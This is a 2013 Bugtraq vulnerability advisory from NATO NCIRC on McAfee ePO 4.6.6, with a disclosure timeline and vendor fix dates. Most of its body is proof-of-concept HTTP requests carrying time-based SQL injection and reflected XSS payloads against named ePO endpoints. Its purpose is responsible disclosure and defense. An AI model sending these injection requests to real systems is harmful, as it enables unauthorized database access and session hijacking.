看板 Bugtraq 關於我們 聯絡資訊
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC Multiple vulnerabilities in McAfee ePO 4.6.6 =20 Affected Product: McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions =20 Timeline: =20 08 June 2013 - Vulnerability found 12 June 2013 - Vendor informed 12 June 2013 - Vendor replied/confirmed & opened service ticket 12 July 2013 - Vendor responded with dates for solutions =20 Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int) =20 CVE: To be assigned =20 NCIRC ID: NCIRC-2013127-01 =20 Description: Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL injection were identified in the latest version of McAfee ePO (4.6.6). All identified vulnerabilities were discovered post authentication. =20 Vulnerability Details: =20 1. SQL injection a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=3Depo.rt.computer&uid= =3D 6waitf or%20delay'0%3a0%3a20'-- &index=3D0&datasourceID=3D&orion.user.security.token=3D2LoWTAOfWJ4ZCjxY&a= jax Mode=3Dstandard HTTP/1.1 b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=3Depo.rt.computer= &uid=3D1;%20WAITFOR%20DELAY%20'0:0:0';-- &datasourceID=3DListDataSource.orion.dashboard.chart.datasource.core.quer= y Factory %3Aquery.2&index=3D0 HTTP/1.1 McAfee Solution: Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013. Item "b" has been addressed per Security Bulletin SB10043. (https://kc.mcafee.com/corporate/index?page=3D3Dcontent&id=3D3DSB10043) =20 =20 2. Reflected XSS a. POST /core/loadDisplayType.do HTTP/1.1=3D20 displayType=3Dtext_lookup&operator=3Deq&propKey=3DEPOLeafNode.AgentVersio= n&ins tanceId=3D<script>alert(182667)</script>&orion.user.security.token=3DZCFb= pCp y3ldihsCW&ajaxMode=3Dstandard =20 b. POST /console/createDashboardContainer.do HTTP/1.1 displayType=3Dtext_lookup&operator=3Deq&propKey=3DEPOLeafNode.AgentVersio= n&ins tanceId=3D<script>alert(182667)</script>&orion.user.security.token=3DZCFb= pCp y3ldihsCW&ajaxMode=3Dstandard =20 c. POST /console/createDashboardContainer.do HTTP/1.1 elementId=3D3DcustomURL.dashboard.factory%3Ainstance&index=3D3D2&pageid=3D= 3D30 & width=3D3D1118&height=3D3D557&refreshInterval=3D3D5&refreshIntervalUnit=3D= 3DMIN& filteringEnabled=3D3Dfalse&mo nitorUrl=3D3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</= s cript>&orion.user.sec urity.token=3D3D9BslgbJEv2JqQy3k&ajaxMode=3D3Dstandard =20 d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=3D1";</script><script>alert(14798= 1 )</script>&orion.user.security.token=3DZCFbpCpy3ldihsCW&ajaxMode=3Dstanda= rd HTTP/1.1 =20 e. GET /ComputerMgmt/sysDetPanelQry.do?uid=3D<script>alert(149031)</script>&orio= n ..user.security.token=3DZCFbpCpy3ldihsCW&ajaxMode=3Dstandard HTTP/1.1 =20 f. GET /ComputerMgmt/sysDetPanelQry.do?uid=3D>"'><script>alert(30629)</script>&o= r ion.user.security.token=3D>"'><script>alert(30629)</script>&ajaxMode=3D>"= '>< script>alert(30629)</script> HTTP/1.1 =20 g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=3D<script>alert(146243)</script>&= o rion.user.security.token=3DZCFbpCpy3ldihsCW&ajaxMode=3Dstandard HTTP/1.1 =20 h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=3D>"'><script>alert(30565)</scrip= t >&orion.user.security.token=3D>"'><script>alert(30565)</script>&ajaxMode=3D= > "'><script>alert(30565)</script> HTTP/1.1 =20 McAfee Solution: Each of these items will be addressed in ePO 4.6.7 due out in late Q3 2013. =20